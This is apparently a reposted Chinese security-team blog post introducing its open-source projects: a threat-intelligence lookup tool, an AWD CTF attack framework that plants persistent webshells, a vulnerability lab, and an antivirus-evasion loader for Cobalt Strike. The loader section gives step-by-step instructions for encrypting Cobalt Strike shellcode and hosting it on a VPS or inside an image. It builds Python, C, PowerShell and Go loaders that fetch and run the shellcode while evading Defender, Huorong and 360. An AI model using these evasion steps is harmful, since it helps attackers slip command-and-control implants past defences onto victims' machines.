我们的一些开源项目介绍

admin 2021年3月16日05:01:11评论243 views字数 3753阅读12分30秒阅读模式

点击蓝字

我们的一些开源项目介绍

关注我们



声明

本文作者:Keac
本文字数:2500

阅读时长:10~20分钟

附件/链接:点击查看原文下载

本文属于【狼组安全社区】原创奖励计划,未经许可禁止转载


由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,狼组安全团队以及文章作者不为此承担任何责任。

狼组安全团队有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经狼组安全团队允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。



前言



开源是我们拓展技术边界和技术价值的一种方式

欢迎投递简历加入我们一起努力

[email protected]


我们的一些开源项目介绍


我们的一些开源项目介绍




一、

TIG 威胁情报收集

https://github.com/wgpsec/tig
Threat Intelligence Gathering 威胁情报收集,旨在提高蓝队拿到攻击 IP 后对其进行威胁情报信息收集的效率。

tig Threat Intelligence Gathering 威胁情报收集,旨在提高蓝队拿到攻击 IP 后对其进行威胁情报信息收集的效率,目前已集成微步、IP 域名反查、Fofa 信息收集、ICP 备案查询、IP 存活检测五个模块,现已支持以下信息的查询:

  • ✅ 

    微步标签

  •   IP 域名反查

  • ✅ 

    ICP 备案查询

  • ✅ 

    IP 存活检测

  • ✅ 

    开放端口查询

  • ……

后续将集成更多模块,如有好的建议或遇到 Bug 欢迎与我反馈

我们的一些开源项目介绍

师傅Teamssix的个人公众号
我们的一些开源项目介绍

二、

CS-Avoid-killing

https://github.com/wgpsec/CS-Avoid-killing
招师傅啦,欢迎投递简历至 [email protected] 一起研究免杀
一款CS免杀加载器,CS免杀,包括python版和C版本的(经测试Python打包的方式在win10上存在bug,无法运行,Win7测试无异常

V1.0: 目前测试可以过Defender/火绒的静杀+动杀,360还没测= =不想装360全家桶了,可以自行测试

下一步开发计划:

V1.5: 加入C版本CS免杀(已完成)

V1.7:加入Powershell的免杀(已完成)

V2.0:开发出UI界面

V2.0: 开发成在线免杀平台(已完成)

PS: 在实际使用中发现图形化界面不利于和其他工具结合,相比之下命令行的方式更具有扩展性

关于自己写的在线免杀平台,暂不考虑开源,主要是觉得目前的技术还比较薄弱,如果有想加入团队一起研发的师傅或者是想体验可以联系我


V3.0: 想办法结合更多免杀技术(想去研究下进程注入/文件捆绑,不知道免杀效果怎样)

  • V3.1 增加了go版本(可过火绒/360/defender)

依赖环境

python:

  • python2

  • pyinstaller

  • requests

C: VS2019默认就够了

Powershell: Win10上测试没有问题,也就是ps5.1,更低版本未测试

go: go

安装

git clone https://github.com/wgpsec/CS-Avoid-killing.git

使用

  1. 先通过CS生成C格式的shellcode:Attacks -> packages -> Payload Generator选择一个listener然后生成一个C的shellcode(其实就是二进制代码)

  2. Python版:

    1. 将生成的shellcode填入generator.py的shellcode变量中,填入一个Key,用于后续的RC4加密

    2. 运行generator.py,生成的payload自动保存在payload.txt中.

    3. 将payload.txt上传到你的VPS中,后续生成的加载器会从VPS中获取加密shellcode并在本地解密后执行

    4. 将在VPS上的payload路径填入PyLoader.py的url变量中,填入你刚刚设置的Key

    5. python pyinstaller.py -F -w PyLoader.py打包文件,可执行文件在pyshellcode文件夹下的dist中,双击运行可以看到主机上线

  3. C版本:

    1. 按要求填入你自己的Key,shellcdoe长度和shellcode,执行

    2. 将第一行的数字复制进Loader的Base64ShellLen字段中,将第二行生成的加密shellcode保存在payload.txt文件中并将其放在服务器上(~~如果不叫这名或者不在跟路径,需要自己改char request[1024] = "GET /RC4Payload32.txt HTTP/1.1rnHost:";中的路径) 在path中填入可以访问到payload的路径即可(Ex: /test/payload.txt)

    3. 在Loader中填入自己的Key和VPS的IP,编译

    4. 执行编译出的exe,CS上线

  4. Powershell版本:

    1. 在CS中生成Powershell版本的payload.ps1

    2. Python3 PSconfusion.py payload.ps1 AVpayload.ps1

    3. 经测试能过目前所有杀软的静杀,动杀的话,由于CS中有些模块不免杀,所以加载这些模块时可能会触发动杀,这个以后再研究怎么绕过

  5. go版本:

    1. 将一张不要太大的图片放入同一文件夹下

    2. 将生成的shellcode填入generator.py的shellcode变量中, 执行python generator YourRC4key ImageName ,生成的shellcode会自动追加到图片末尾

    3. 将图片上传至图床(找那种不会压缩的图床,保证shellcode不会被删掉)

    4. 将图片url和你的RC4key填入CS-Loader.go的相应位置

    5. 使用命令go build -ldflags="-H windowsgui" CS-Loader.go生成exe,可以用upx压缩下

    6. 执行exe,CS上线

注意

  1. pyinstaller安装细节

    最后一个支持python2的版本是3.6(最新版pyinstall不再支持python2)

    网址:https://github.com/pyinstaller/pyinstaller/releases

    需要安装pywin32:https://github.com/mhammond/pywin32

  2. 目标是什么环境就在什么环境上打包,否则可能会出现无法上线的情况,不推荐使用py3对项目进行改造,ctypes对py3的支持不太好,会有些莫名其妙的bug

  3. 经过测试,C版本在X86Debug模式编译下无任何问题,Release模式下会存在莫名bug,在某些电脑上无法正常上线,请根据需求自行测试

  4. 编译选项不要选择动态编译,否则可能会因为目标靶机上缺少相应dll而无法运行.

  5. 加载ps脚本的方式这里不做讨论,有师傅已经总结的非常好了,请自行百度

  6. go版本build前建议先set GOARCH=amd64,同时使用64位的shellcode,32位打包出来的程序会报一个在ntdll中找不到函数的错误,曾有人提问过:https://stackoverflow.com/questions/58649055/failed-to-find-rtlcopymemory-procedure-in-ntdll-dll-only-when-goarch-386

三、

WolfAwd

https://github.com/wgpsec/WolfAwd
WolfAWD 一款基于Python的AWD线下比赛框架

因为以前的设计过于繁琐,距离可以用遥遥无期,因此参考另一个框架对项目进行重构

基本想法,框架会加载games下poc,需要传入-m参数,指定要加载的poc 加载后,根据用户传入的指令,例如get_flag 调用library下的all_attatck.py中的函数,生成cmd命令,然后利用poc执行,cmd支持返回字符串或者元组,元组内容为(执行的命令,回调函数),例如执行的命令可以为 cat /flag ,然后在回调函数中 获取flag并且提交,框架获取到此种类型的cmd时,会在获取命令执行结果后,执行回调函数 同时框架支持执行利用poc进行权限维持,例如上传不死马,下次get_flag会首先,会先利用不死马进行get_flag


我们的一些开源项目介绍


四、

VulnRange

https://github.com/wgpsec/WolfAwd
VulnRange的定位是一个漏洞靶场,用于快速的启动漏洞环境,便于漏洞复现和研究

Web安全基础靶场

我们的一些开源项目介绍

我们的一些开源项目介绍

集合了常见的Web安全漏洞,多数是直接拉取开源的靶场环境,比如DVWA、sqli-labs、upload-labs

组件靶场分类

以组件名称分类展示各个中间件和CMS的靶场环境

我们的一些开源项目介绍

开启靶机

点击 "启动靶机环境" 即可开启相关靶机。

我们的一些开源项目介绍

等的时间过长的话可以切换到系统中看看环境构建进度

我们的一些开源项目介绍

靶机环境构建完成后,点击链接即可访问

我们的一些开源项目介绍







后记



以上介绍的工具只是我们研究开源的一部分
还有更多的工具与在线平台可前往
https://github.com/wgpsec 
https://www.wgpsec.org/service


作者



我们的一些开源项目介绍

Keac

一个喜欢搞点事情的人



扫描关注公众号回复加群

和师傅们一起讨论研究~


WgpSec狼组安全团队

微信号:wgpsec

Twitter:@wgpsec


我们的一些开源项目介绍
我们的一些开源项目介绍


本文始发于微信公众号(WgpSec狼组安全团队):我们的一些开源项目介绍

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年3月16日05:01:11
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   我们的一些开源项目介绍http://cn-sec.com/archives/291145.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息